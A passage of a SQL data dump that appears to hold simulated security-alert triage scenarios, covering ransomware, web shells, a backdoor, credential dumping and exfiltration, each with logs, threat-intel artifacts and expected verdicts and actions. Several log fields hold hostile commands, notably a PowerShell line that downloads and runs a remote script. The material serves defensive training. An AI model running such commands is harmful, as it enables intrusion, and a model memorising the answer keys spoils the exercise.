(362, 'Data Encryption in Progress', 'critical', 'File Integrity Monitoring', 'The ransomware begins encrypting files on key servers, prompting the attackers to initiate contact with a ransom demand.', 'Ransomware Encryption', 'T1486', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"event_id\":\"FIM-20231005-001\",\"event_type\":\"file_modification\",\"description\":\"Suspicious file encryption activity detected on server.\",\"affected_host\":\"192.168.1.10\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"admin_user\",\"filename_encrypted\":\"confidential_data.xlsx\",\"ransomware_name\":\"CryptoLockerSim\",\"process_name\":\"encryptor.exe\",\"process_id\":4567}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to CryptoLockerSim ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_system\",\"verdict\":\"suspicious\",\"details\":\"File targeted by ransomware encryption.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(363, 'Ransom Note and Communication', 'critical', 'Incident Response Team', 'A ransom note has appeared on encrypted systems, instructing the company to contact the attackers for decryption keys. The note includes specific communication channels and requests for payment in cryptocurrency. The Incident Response Team is working to find a flaw in the encryption while simulating negotiations with the attackers.', 'Ransomware Note', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:45:00Z\",\"event\":\"Ransomware Note Detected\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.5\",\"ransom_note_filename\":\"READ_ME.txt\",\"ransom_note_content\":\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\",\"attacker_email\":\"attacker@example.com\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"j.doe\",\"severity\":\"Critical\",\"encryption_algorithm\":\"AES-256\",\"affected_systems\":[\"10.0.0.5\",\"10.0.0.10\"]}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"email reputation service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with ransom demands.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash of the ransomware binary detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename for ransom notes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(364, 'Suspicious Web Shell Detected on IIS Server', 'high', 'IIS Server Logs', 'A suspicious web shell was detected on a telecommunications provider\'s IIS server. The attacker exploited a web vulnerability to deploy a web shell, gaining initial access.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"server_ip\":\"192.168.1.50\",\"client_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/shell.aspx\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"session_id\":\"123456abcdef\",\"filename_uploaded\":\"shell.aspx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"anonymous\"}', '2026-01-03 00:54:31', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous web shell attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File commonly used as a web shell for unauthorized access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a web shell previously identified in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(365, 'Anomalous PowerShell Activity Observed', 'medium', 'PowerShell Logs', 'Unusual PowerShell commands were executed to download additional payloads. This behavior suggests an attempt to leverage legitimate tools for malicious purposes, commonly known as \'living off the land\'.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4104,\"process_id\":1234,\"script_block_id\":\"abc123\",\"user\":\"jdoe\",\"host\":\"DESKTOP-7A89C4K\",\"ip_address\":\"10.0.0.17\",\"command\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\"\",\"external_ip\":\"203.0.113.45\",\"downloaded_file\":\"malicious.ps1\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\"}', '2026-01-03 00:54:31', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.17\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host executing the PowerShell command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repositories\",\"verdict\":\"malicious\",\"details\":\"Script associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(366, 'Creation of Hidden Scheduled Task', 'medium', 'Task Scheduler Logs', 'To ensure persistent access, Gallium APT creates a covert scheduled task, allowing them to execute scripts at regular intervals.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"EventID\":106,\"Timestamp\":\"2023-10-15T14:22:43Z\",\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\HiddenTask\",\"Action\":\"Create\",\"User\":\"COMPANY\\\\jdoe\",\"HostIP\":\"192.168.1.45\",\"AttackerIP\":\"203.0.113.54\",\"FilePath\":\"C:\\\\Windows\\\\System32\\\\hidden_task.ps1\",\"MD5Hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-03 00:54:31', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Gallium APT\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a malicious script used by Gallium APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(367, 'Unauthorized Access to Network Map', 'medium', 'Network Traffic Analysis', 'The attackers initiated a network scan from an external IP address, attempting to map out the telecom infrastructure. This is part of a lateral movement strategy to identify high-value targets within the network.', 'Lateral Movement', 'T1046', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":80,\"action\":\"allowed\",\"username\":\"jdoe\",\"filename\":\"network_scan_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Network Scan Detected\"}', '2026-01-03 00:54:31', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Local network device\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_scan_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized network scanning\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Repository\",\"verdict\":\"suspicious\",\"details\":\"Hash found in several malware variants\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(368, 'Exfiltration of Call Detail Records Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'The Gallium APT group has successfully exfiltrated Call Detail Records (CDR) from the compromised network, targeting high-value individuals. The operation was detected as sensitive files were transferred to an external IP address.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:43Z\",\"event_id\":\"DLP-EXFIL-005\",\"source_ip\":\"192.168.15.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"transferred_files\":[{\"filename\":\"target_CDR_records.zip\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"size\":\"15MB\"}],\"user\":\"compromised_user\",\"action\":\"File Transfer\",\"status\":\"Success\"}', '2026-01-03 00:54:31', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Gallium APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially malicious file transfer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"target_CDR_records.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file identified in exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"malicious\",\"details\":\"User account compromised and used in exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(369, 'Suspicious Macro-Enabled Document Detected', 'high', 'Email Gateway Logs', 'A potentially malicious macro-enabled document was detected in an email attachment. The document is designed to execute a payload upon enabling macros, indicating an attempt to gain initial access.', 'Initial Access', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:25:34Z\",\"email_sender\":\"john.doe@maliciousdomain.com\",\"email_recipient\":\"employee1@company.com\",\"subject\":\"Important Update on Your Account\",\"attachment_name\":\"AccountUpdate.docm\",\"attachment_hash\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"malware_family\":\"Emotet\",\"action_taken\":\"Quarantined\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"AccountUpdate.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro-enabled document potentially executing malicious code.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known phishing and malware distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(370, 'Macro Execution Triggers Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'Once the macros are enabled, a hidden script is executed, initiating the deployment of the POWERSTATS backdoor.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.45\",\"username\":\"jdoe\",\"process_name\":\"winword.exe\",\"file_name\":\"malicious_macro.docm\",\"script_executed\":\"powershell.exe -nop -w hidden -enc d2hvYW1p\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Macro in document executed, launching PowerShell script for POWERSTATS backdoor.\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal endpoint targeted by malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_macro.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macro that executes malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the POWERSTATS malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(371, 'POWERSTATS Backdoor Installed', 'high', 'Registry Change Logs', 'The POWERSTATS backdoor has been installed on the system. It modifies registry settings to ensure continued operation across reboots, establishing persistence.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T14:32:45Z\",\"event_id\":4657,\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"PowerStatsService\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\pstats.exe\",\"user\":\"SYSTEM\",\"user_sid\":\"S-1-5-18\",\"process_id\":1234,\"process_name\":\"regedit.exe\",\"source_ip\":\"185.199.108.153\",\"hash\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"internal_ip\":\"192.168.1.45\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for POWERSTATS\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as POWERSTATS backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Associated with persistence mechanism\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host communicating with C2\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(372, 'Encrypted Communication with C2 Server Detected', 'high', 'Network Traffic Analysis', 'The infected system at 192.168.10.5 has begun encrypted communication with a known C2 server at 203.0.113.45 using HTTPS over non-standard ports. This behavior is consistent with advanced tactics to maintain hidden communication channels.', 'Command and Control', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:20Z\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":50505,\"dst_port\":8443,\"encrypted\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"url\":\"https://203.0.113.45/command\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"payload.bin\",\"username\":\"infected_user\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Command and Control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Associated with malware payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Potentially malicious file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"infected_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on affected system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(373, 'Lateral Movement Attempt Detected', 'high', 'Internal Network Logs', 'An advanced lateral movement attempt was detected on the network. The attackers used a compromised host to attempt to access other machines within the network, utilizing stolen credentials and suspicious file transfers.', 'Lateral Movement', 'T1086 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"10.0.1.5\",\"destination_ip\":\"192.168.1.20\",\"attacker_ip\":\"203.0.113.12\",\"compromised_user\":\"jdoe\",\"malicious_file\":\"payload.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"PowerShell execution\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.20\\\\share\\\\payload.exe\",\"detected_by\":\"Host Intrusion Prevention System (HIPS)\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable file\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL),
(374, 'Credential Dumping Activity Spotted', 'high', 'Security Information and Event Management (SIEM)', 'An advanced attack has been identified where the attackers have deployed a credential dumping tool to extract passwords from memory, potentially to escalate privileges within the network. The activity was traced back to a specific host within the internal network, and network traffic analysis confirmed communication with a known malicious IP.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:35Z\",\"event_type\":\"credential_dumping\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"185.143.221.45\",\"file_name\":\"lsass_dump.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"administrator\",\"process_name\":\"lsass.exe\",\"detected_tool\":\"Mimikatz\",\"network_traffic\":{\"bytes_sent\":2048,\"bytes_received\":1024,\"protocol\":\"HTTP\"}}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.221.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lsass_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly associated with credential dumping attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash linked to Mimikatz malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Privileged user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(375, 'File Transfer Activity to External Server', 'critical', 'Data Loss Prevention (DLP) System', 'Sensitive information begins to flow out of the network, sent to an external server under the attackers\' control. Advanced techniques are being utilized to exfiltrate data.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"dlp-20231012-001\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_sha256\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"file_name\":\"financial_reports_q3_2023.xlsx\",\"transfer_protocol\":\"HTTPS\",\"transfer_size\":\"15MB\",\"action_taken\":\"Alert Triggered\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Lookup\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT 